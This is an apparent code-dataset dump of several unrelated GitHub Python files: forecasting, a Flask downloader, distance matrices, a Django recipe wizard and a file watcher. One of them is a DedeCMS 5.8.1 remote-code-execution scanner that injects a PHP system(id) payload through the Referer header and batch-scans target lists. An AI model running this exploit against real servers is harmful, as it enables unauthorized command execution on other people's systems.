'Soda_Volume']]
a1s1_prophet_feed = a1s1_prophet_feed.rename(columns={'YearMonth': 'ds'})
a1s1_prophet_feed = a1s1_prophet_feed.rename(columns={'Volume': 'y'})
a1s1_prophet = Prophet()
a1s1_prophet.add_regressor('Avg_Max_Temp')
a1s1_prophet.add_regressor('Industry_Volume')
a1s1_prophet.add_regressor('Soda_Volume')
### Add hyper parameter tuning.
a1s1_param_grid = {
'changepoint_prior_scale': [1.6],
'seasonality_prior_scale': [0.1],
#'changepoints': ['2013-10-01','2014-10-01','2015-10-01','2016-10-01','2017-10-01'],
#'seasonality_mode': ['multiplicative'],
'changepoint_range': [0.95],
}
# Generate all combinations of parameters, for a1s1 Prophet
a1s1_all_params = [dict(zip(a1s1_param_grid.keys(),
a1s1)) for a1s1 in itertools.product(*a1s1_param_grid.values())]
# Implement all parameters into algorithm
for a1s1params in a1s1_all_params:
a1s1_prophet = Prophet(**a1s1params).fit(a1s1_prophet_feed)
a1s1forecast = a1s1_prophet.predict(Futures_df)
#Plot the overall volume prediction from a1s1 Prophet
a1s1_prophet.plot(a1s1forecast)
pyplot.show()
#Crossval a1s1 Prophet
a1s1forecast = a1s1_prophet.predict(Futures_df)
a1s1_crossval = cross_validation(a1s1_prophet, initial='1095 days', period='31 days', horizon = '31 days')
a1s1_prophet_performance = performance_metrics(a1s1_crossval)
a1s1_fig_performance = plot_cross_validation_metric(a1s1_crossval, metric='mape')
#Final prediction 1 month
print(a1s1forecast.head(1))
| SpeciesXBeer/BeerVolumeProphet | Entire Beer Volume Forecase .py | Entire Beer Volume Forecase .py | py | 22,300 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "pandas.to_datetime",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
... |
71782650344 | #!/usr/bin/env python
# -*- conding:utf-8 -*-
import requests
import argparse
import sys
import urllib3
import re
from prettytable import PrettyTable
urllib3.disable_warnings()
def title():
    """Print the tool banner: vulnerability name, usage hint, and author/repo."""
    print("""
            Dedecms_5.8.1 代码执行漏洞  
            Use:python3 dedecms_5.8.1_RCE.py
            Author: Henry4E36
            Github:https://github.com/Henry4E36/dedecms_5.8.1_RCE
                """)
class Information(object):
    """Probes DedeCMS 5.8.1 targets for the /plus/flink.php code-execution flaw."""

    def __init__(self, args):
        # Keep the parsed namespace plus the two fields this class reads.
        self.args = args
        self.url = args.url
        self.file = args.file

    def target_url(self):
        """Probe self.url once.

        Returns a 3-tuple: (url, True, cmd_id) when the target looks
        vulnerable, (url, False, "NULL") when it does not, or
        (url, "Error", exception) on any request/parsing failure.
        """
        probe_url = self.url + "/plus/flink.php?dopost=save"
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
            "Referer": '<?php "system"(id);?>'
        }
        try:
            res = requests.get(url=probe_url, headers=headers, verify=False, timeout=5)
            if "uid" in res.text and res.status_code == 200:
                # The vulnerable page answers with a JS location assignment;
                # capture its target as the command identifier.
                cmd_id = re.findall(r"location='(.*)", res.text)[0]
                return self.url, True, cmd_id
            return self.url, False, "NULL"
        except Exception as e:
            return self.url, "Error", e

    def file_url(self):
        """Probe every target listed (one per line) in self.file; return result tuples."""
        outcomes = []
        with open(self.file, "r") as handle:
            for line in handle:
                target = line.strip()
                if target[:4] != "http":
                    target = "http://" + target
                self.url = target.strip()
                outcomes.append(self.target_url())
        return outcomes
if __name__ == "__main__":
    title()
    parser = argparse.ArgumentParser(description='Dedecms_5.8.1 代码执行漏洞')
    parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")
    parser.add_argument("-f", "--file", metavar="file", help="Targets in file eg:\"ip.txt\"")
    args = parser.parse_args()
    # Exactly one of -u/-f plus its value is expected (script name + 2 argv items).
    if len(sys.argv) != 3:
        print(
            "[-] 参数错误!\neg1:>>>python3 dedecms_5.8.1_RCE.py -u http://127.0.0.1\neg2:>>>python3 dedecms_5.8.1_RCE.py -f ip.txt")
    elif args.url:
        # Single-target mode: results is (url, True/False/"Error", detail).
        results = Information(args).target_url()
        if results[1] is True:
            # Bug fix: the target system is results[0] (the URL) and the
            # response detail is results[-1] (cmd_id); the original printed
            # results[-1] as the system and results[1] (True) as the response.
            print(f"\033[31m[{chr(8730)}] 目标系统: {results[0]} 存在代码执行漏洞!\033[0m")
            print(f"[{chr(8730)}] 响应为:{results[-1]}")
        elif results[1] is False:
            # Same index fix: show the probed URL, not the "NULL" placeholder.
            print(f"[\033[31mx\033[0m] 目标系统: {results[0]} 不存在代码执行漏洞!")
            print("[" + "-" * 100 + "]")
        elif results[1] == "Error":
            print("[\033[31mX\033[0m] 连接错误!")
            print("[" + "-"*100 + "]")
    elif args.file:
        # Batch mode: render one table row per probed target. The original
        # had three identical add_row branches (one per possible status);
        # every status from target_url is covered, so a single loop suffices.
        results = Information(args).file_url()
        table = PrettyTable(['序号', '地址', '有无漏洞', '响应'])
        for k, outcome in enumerate(results, start=1):
            table.add_row([k, outcome[0], outcome[1], outcome[2]])
        print(table)
| Henry4E36/dedecms_5.8.1_RCE | dedecms_5.8.1_RCE.py | dedecms_5.8.1_RCE.py | py | 3,462 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "urllib3.disable_warnings",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentPars... |
25852270022 | """Functions for dynamically loading modules and functions.
"""
import importlib
import importlib.util
import os
__author__ = 'Hayden Metsky <hayden@mit.edu>'
def load_module_from_path(path):
    """Load Python module in the given path.

    Args:
        path: path to .py file

    Returns:
        Python module (before returning, this also executes
        the module)

    Raises:
        ImportError: if a module spec cannot be created for path
    """
    path = os.path.abspath(path)

    # Use the filename (without extension) as the module name
    _, filename = os.path.split(path)
    module_name, _ = os.path.splitext(filename)

    spec = importlib.util.spec_from_file_location(module_name, path)
    if spec is None:
        # spec_from_file_location returns None for unloadable paths; fail
        # with a clear error instead of an AttributeError on None below.
        raise ImportError("Cannot create a module spec for %s" % path)
    module = importlib.util.module_from_spec(spec)

    # Execute the module
    spec.loader.exec_module(module)

    return module
def load_function_from_path(path, fn_name):
    """Load Python function in a module at the given path.

    Args:
        path: path to .py file
        fn_name: name of function in the module

    Returns:
        Python function

    Raises:
        Exception if the module at path does not contain a function
        with name fn_name
    """
    module = load_module_from_path(path)
    # Sentinel-based lookup: a single getattr replaces the original's
    # hasattr-then-getattr pair while still treating an explicit None
    # attribute as present.
    _missing = object()
    fn = getattr(module, fn_name, _missing)
    if fn is _missing:
        raise Exception(("Module at %s does not contain function %s" %
                         (path, fn_name)))
    return fn
| broadinstitute/catch | catch/utils/dynamic_load.py | dynamic_load.py | py | 1,312 | python | en | code | 63 | github-code | 36 | [
{
"api_name": "os.path.abspath",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "os.path.split",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number... |
71785754983 | #!/usr/bin/python3
import datetime
import flask
from . import client
from . import session
bp = flask.Blueprint("main", __name__)
def format_time(seconds):
    """Render a duration in whole seconds as a timedelta string, e.g. "1:01:01"."""
    duration = datetime.timedelta(seconds=seconds)
    return str(duration)
def format_size(size):
    """Render a byte count with a binary-scaled unit suffix, e.g. "3.1MB".

    Negative sizes keep their sign. Bug fix: values of 1024 GB or more now
    fall through to a TB suffix instead of returning None (the original
    loop exhausted its units and implicitly returned None).
    """
    for unit in ["B", "KB", "MB", "GB"]:
        if abs(size) < 1024.0:
            return "%3.1f%s" % (size, unit)
        size /= 1024.0
    return "%3.1f%s" % (size, "TB")
@bp.route("/", methods=["GET", "POST"])
def index():
    """Landing page: on POST, fetch metadata for the submitted address and re-render."""
    # The context-manager target is an attribute expression: the open client
    # is stored on flask.g for the duration of this request.
    with client.Client() as flask.g.client:
        # Helpers exposed to the template for rendering durations and sizes.
        context = {
            "format_time": format_time,
            "format_size": format_size
        }
        if flask.request.method == "POST":
            address = flask.request.form["address"]
            context["address"] = address
            context["meta"] = flask.g.client.metadata(address)
        return flask.render_template("index.html", **context)
@bp.route("/status")
def status():
    """Download-status page: list downloads, hiding ones not started by this session."""
    with client.Client() as flask.g.client, session.Session() as flask.g.session:
        downloads = flask.g.client.get_downloads()
        # Directories this browser session started downloads into.
        required_directories = flask.g.session.get_directories()
        existing_directories = set()
        for download in downloads:
            if download["directory"] in required_directories:
                existing_directories.add(download["directory"])
                download["hidden"] = False
            else:
                # Downloads from other sessions are flagged hidden for the template.
                download["hidden"] = True
        # Prune session state to directories that still have an active
        # download, so stale entries do not accumulate.
        flask.g.session.set_directories(existing_directories)
        context = {
            "downloads": downloads,
            "format_size": format_size
        }
        return flask.render_template("status.html", **context)
@bp.route("/download", methods=["POST"])
def download():
    """Start a new download from the posted form, remember its directory, redirect home."""
    with client.Client() as flask.g.client, session.Session() as flask.g.session:
        form = flask.request.form
        address = form["address"]
        # Join the requested video/audio formats into a single selector;
        # an empty selection (both fields blank) means "backend default".
        combined = (form["video_format"] + "+" + form["audio_format"]).strip("+")
        if not combined:
            combined = None
        directory = flask.g.client.download(address, combined)
        # Track the directory so /status shows this session's downloads.
        flask.g.session.get_directories().add(directory)
        return flask.redirect(flask.url_for(".index"))
@bp.route("/restart", methods=["POST"])
def restart():
    """Tell the backend client process to exit, then redirect to the index page."""
    # The context-manager target stores the open client on flask.g for this request.
    with client.Client() as flask.g.client:
        flask.g.client.exit()
        return flask.redirect(flask.url_for(".index"))
| jakub-vanik/youtube-ripper | http/ripper/main.py | main.py | py | 2,200 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Blueprint",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask.g",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"l... |
1914874686 | import math
from distributed import Client
from tqdm import tqdm
import numpy as np
import pandas as pd
def calculate_distance_between_queries(data_df, queries, metric, dask_client: Client= None, n_blocks = None):
    """Calculate pairwise distances for the requested query pairs only.

    Args:
        data_df: dataframe of series, one instance per row.
        queries: iterable of (i1, i2) pairs of positional row indices into
            data_df (each chunk element unpacks into two indices below).
        metric: distance metric forwarded to _calculate_pair_list.
        dask_client: optional distributed client; if None, chunks are
            computed serially with a tqdm progress bar.
        n_blocks: number of chunks to split `queries` into.
            NOTE(review): np.array_split needs an integer section count, so
            calling with the default n_blocks=None fails — confirm callers
            always pass a value.

    Returns:
        Symmetric DataFrame of distances, indexed by data_df's original
        index labels for the involved instances; unqueried pairs stay NaN.
    """
    # Restrict the working set to rows that appear in at least one query.
    involved_instances = np.unique(queries, axis = None)
    relevant_data = data_df.reset_index(drop=True).loc[involved_instances]
    chunks = np.array_split(queries, n_blocks)
    if dask_client is None:
        results = [_calculate_pair_list(task, metric, relevant_data) for task in tqdm(chunks, desc='calculating distances')]
    else:
        # Broadcast the relevant slice to every worker once, then fan the
        # chunks out and gather the per-chunk results.
        data_df_future = dask_client.scatter(relevant_data, broadcast=True)
        futures = dask_client.map(_calculate_pair_list, chunks, metric = metric, data_df = data_df_future)
        results = dask_client.gather(futures)
    # collect the results in a distance matrix (NaN where no pair was queried)
    n_series = relevant_data.shape[0]
    dist_matrix = np.full((n_series, n_series), np.nan)
    dist_matrix = pd.DataFrame(dist_matrix, index = relevant_data.index, columns = relevant_data.index)
    for chunk, result in zip(chunks, results):
        for (i1,i2), r in zip(chunk, result):
            # Mirror each value: the distance is treated as symmetric.
            dist_matrix.loc[i1, i2] = r
            dist_matrix.loc[i2, i1] = r
    # make into df with original index
    distance_df = pd.DataFrame(dist_matrix.to_numpy(), index= data_df.index[involved_instances], columns = data_df.index[involved_instances])
    return distance_df
def calculate_full_distance_matrix(data_df, metric, dask_client:Client=None, n_blocks = None):
    """
    Calculates the full pairwise distance matrix for the rows of data_df.

    :param data_df: DataFrame with one series/profile per row.
    :param metric: object exposing ``distance(profile1, profile2)``.
    :param dask_client: optional dask client; when given, blocks are computed
        in parallel on the workers.
    :param n_blocks: approximate number of blocks to split the matrix into;
        defaults to 10 per dask worker, or 1 when running serially.
    :return: symmetric DataFrame of distances indexed like data_df.
    """
    if n_blocks is None:
        if dask_client is not None:
            # aim for ~10 blocks per worker so the scheduler can balance load
            n_blocks = len(dask_client.scheduler_info()['workers'])*10
        else:
            n_blocks = 1
    # Make the tasks: only lower-triangular blocks (diagonal included) are
    # generated because the distance is symmetric.
    n_series = data_df.shape[0]
    print('generating blocks')
    blocks = _generate_blocks(n_series, n_blocks)
    print('calculating blocks')
    # execute the tasks, serially or on the dask cluster
    if dask_client is None:
        results = [_calculate_block(task, metric, data_df) for task in tqdm(blocks, desc='Calculating distances')]
    else:
        # ship the data once to every worker instead of once per task
        data_df_future = dask_client.scatter(data_df, broadcast = True)
        futures = dask_client.map(_calculate_block, blocks, metric = metric, data_df = data_df_future)
        results = dask_client.gather(futures)
    # gather the per-block results into one dense matrix
    dist_matrix = np.zeros((n_series, n_series))
    for result, block in zip(results, blocks):
        dist_matrix[block[0][0]: block[0][1], block[1][0]:block[1][1]] = result
    # make upper triangular matrix into full symmetrical distance matrix;
    # diagonal blocks also filled strictly-upper entries, so zero those first.
    # NOTE(review): the addition doubles the diagonal itself — harmless if
    # metric.distance(p, p) == 0, but confirm for the metrics in use.
    dist_matrix[np.triu_indices(data_df.shape[0], k=1)] = 0
    dist_matrix = dist_matrix + dist_matrix.T
    # make into a nice dataframe with the original index labels
    distance_df = pd.DataFrame(dist_matrix, index=data_df.index, columns=data_df.index)
    return distance_df
def _generate_blocks(nb_series, total_blocks=500):
    """
    Partition an nb_series x nb_series matrix into roughly equally sized
    square blocks covering the lower triangle (diagonal blocks included),
    so the blocks can be computed in parallel.

    The function does not produce exactly ``total_blocks`` blocks; it cuts
    each dimension into ceil(sqrt(total_blocks)) strips, which lands close.

    Returns a list of ((start_row, end_row), (start_col, end_col)) tuples.
    """
    strips_per_dim = math.ceil(math.sqrt(total_blocks))
    step = math.ceil(nb_series / strips_per_dim)
    return [
        ((r, min(r + step, nb_series)), (c, min(c + step, nb_series)))
        for r in range(0, nb_series, step)
        for c in range(0, r + 1, step)
    ]
def _calculate_pair_list(query_indices, metric, data_df):
    """
    Compute metric.distance for every (i1, i2) label pair in query_indices.

    Returns the distances as a list, in the same order as the pairs.
    """
    return [
        metric.distance(data_df.loc[first], data_df.loc[second])
        for first, second in query_indices
    ]
def _calculate_block(block_indices, metric, data_df):
    """
    Compute the distances between every row of the block's row slice and
    every row of its column slice.

    ``block_indices`` is ((row_start, row_end), (column_start, column_end))
    as produced by _generate_blocks.  Returns a 2D numpy array of shape
    (row_end - row_start, column_end - column_start).
    """
    (row_lo, row_hi), (col_lo, col_hi) = block_indices
    row_profiles = data_df.iloc[row_lo:row_hi]
    col_profiles = data_df.iloc[col_lo:col_hi]
    out = np.zeros((row_profiles.shape[0], col_profiles.shape[0]))
    for i, (_, left) in enumerate(row_profiles.iterrows()):
        for j, (_, right) in enumerate(col_profiles.iterrows()):
            out[i, j] = metric.distance(left, right)
    return out
{
"api_name": "distributed.Client",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "numpy.unique",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "numpy.array_split",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "tqdm.tqdm",
"line... |
30586804681 | from django.contrib.formtools.wizard.views import SessionWizardView
from django.core.urlresolvers import reverse
from django.forms import modelformset_factory
from django.http import HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
# Create your views here.
from recipe.forms import *
from recipe.models import Recipe
# Wizard steps: each entry is (step name, form class).  The ingredient steps
# use model formsets (3 blank rows each); the "recipe" FK is excluded from
# the formsets because RecipeWizard.save_recipe() assigns it manually after
# the parent Recipe has been saved.
FORMS = [("recipe", RecipeForm),
         ("malt", modelformset_factory(MaltIL, formset=MaltFormSet, extra=3, exclude=["recipe"])),
         ("hops", modelformset_factory(HopsIL, formset=HopsFormSet, extra=3, exclude=["recipe"])),
         ("yeast", modelformset_factory(YeastIL, formset=YeastFormSet, extra=3, exclude=["recipe"]))]
class RecipeWizard(SessionWizardView):
    """Multi-step wizard that creates a Recipe together with its
    malt, hops and yeast ingredient lines."""

    template_name = "recipe/recipe_wizard.html"

    def save_recipe(self, form_dict):
        """Persist the recipe form, then attach every ingredient to it.

        Each formset is saved with commit=False so the FK to the freshly
        created recipe can be filled in before the real save.
        """
        recipe = form_dict['recipe'].save()
        for step in ('malt', 'hops', 'yeast'):
            for ingredient in form_dict[step].save(commit=False):
                ingredient.recipe = recipe
                ingredient.save()
        return recipe

    def done(self, form_list, form_dict, **kwargs):
        """Final wizard step: save everything and redirect to the new recipe."""
        recipe = self.save_recipe(form_dict)
        return HttpResponseRedirect(reverse('view_recipe', args=[recipe.id]))
def view_recipe(request, recipe_id):
    """Render the detail page for one recipe; 404 when the id is unknown."""
    recipe = get_object_or_404(klass=Recipe, pk=recipe_id)
    context = {'recipe': recipe}
    return render(request, 'recipe/viewrecipe.html', context)
def view_all_recipes(request):
    """Render the overview page listing every stored recipe."""
    context = {'recipes': Recipe.objects.all()}
    return render(request, 'recipe/viewallrecipes.html', context)
def brewmaster(request, recipe_id):
    """Render the brewmaster page for one recipe; 404 when the id is unknown."""
    recipe = get_object_or_404(klass=Recipe, pk=recipe_id)
    return render(request, 'recipe/brewmaster.html', {'recipe': recipe})
{
"api_name": "django.forms.modelformset_factory",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "django.forms.modelformset_factory",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "django.forms.modelformset_factory",
"line_number": 16,
"usage_type": ... |
17173794780 | # -*- coding: utf-8 -*-
# @Time : 2019/9/10 11:21
# @Author : bjsasc
import json
import logging
import os
import sys
import time
import DataUtil
from pyinotify import WatchManager, Notifier, ProcessEvent, IN_CLOSE_WRITE
# Configure logging with two handlers: one to the console, one to a file.
log = logging.getLogger('file watch ---')
fp = logging.FileHandler('a.log', 'a+', encoding='utf-8')
fs = logging.StreamHandler()
log.addHandler(fs)
log.addHandler(fp)
log.setLevel(logging.DEBUG)
FILE_DIR = r'/home/bjsasc/test/'  # directory watched for incoming files
def check_dir_exist():
    """
    Validate the configured watch directory; log and exit the process when
    FILE_DIR is unset or does not exist on disk.
    """
    # Guard clauses: bail out early on any misconfiguration.
    if not FILE_DIR:
        log.info("The WATCH_PATH setting MUST be set.")
        sys.exit()
    if not os.path.exists(FILE_DIR):
        log.info('The watch path NOT exists, watching stop now: path=%s.' % (FILE_DIR))
        sys.exit()
    log.info('Found watch path: path=%s.' % (FILE_DIR))
def read_json_from_file(file_path):
    """
    Read a JSON array from ``file_path`` and hand every entry to
    data_process().

    :param file_path: path of the JSON manifest file to parse.
    """
    with open(file_path) as handle:
        entries = json.loads(handle.read())
    # process each record in order
    for entry in entries:
        data_process(entry)
def data_process(data: dict):
    """
    Process one record read from the JSON manifest: register the file in the
    database, copy it, update bookkeeping and notify the remote interface.

    :param data: dict with at least a "file_path" key.
    """
    file_path = data["file_path"]
    # parse satellite/payload information out of the file name
    # NOTE(review): weixing_info / zaihe_info are never used below — confirm
    # whether parse_name is needed only for validation side effects.
    name_info = DataUtil.parse_name(file_path)
    weixing_info = name_info[0]
    zaihe_info = name_info[1]
    # open the file and compute its check number
    checknum = DataUtil.check_file(file_path)
    # build the dict that will be persisted to the database
    result = {}
    result['type'] = '1'
    result['name'] = file_path
    result['suffix'] = 'fits'
    result['sourcepath'] = file_path
    result['checknum'] = checknum
    result['status'] = '1'
    # save the record to the database
    DataUtil.save_data(result)
    # copy the file
    # NOTE(review): source and destination are the same path here — confirm
    # this is intended (the real target may be derived inside copy_file).
    DataUtil.copy_file(file_path, file_path)
    # update the date/data bookkeeping
    DataUtil.update_date()
    # call the remote notification interface
    DataUtil.notice(file_path)
class EventHandler(ProcessEvent):
    """pyinotify handler that reacts to files being closed after writing."""

    def process_IN_CLOSE_WRITE(self, event):
        """
        Fired when a file in the watched directory is closed after a write,
        i.e. the transfer finished; only this event type is handled.

        :param event: pyinotify event carrying ``path`` and ``name``.
        """
        # logging.info("create file: %s " % os.path.join(event.path, event.name))
        file_path = os.path.join(event.path, event.name)
        # short grace period before reading the freshly written file
        time.sleep(2)
        log.info('write file finished ...%s' % (file_path))
        read_json_from_file(file_path)
def main():
    """
    Entry point of the file watcher: validate the watch directory, register
    the recursive inotify watch, then block in the notifier loop.
    """
    check_dir_exist()
    watch_manager = WatchManager()
    event_notifier = Notifier(watch_manager, EventHandler())
    # watch recursively and auto-add newly created sub-directories
    watch_manager.add_watch(FILE_DIR, IN_CLOSE_WRITE, rec=True, auto_add=True)
    log.info('Now starting monitor %s' % (FILE_DIR))
    event_notifier.loop()


if __name__ == '__main__':
    main()
| xingyundeyangzhen/zxm | DataWatcher.py | DataWatcher.py | py | 2,812 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "logging.FileHandler",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "logging.StreamHandler",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "logging.D... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.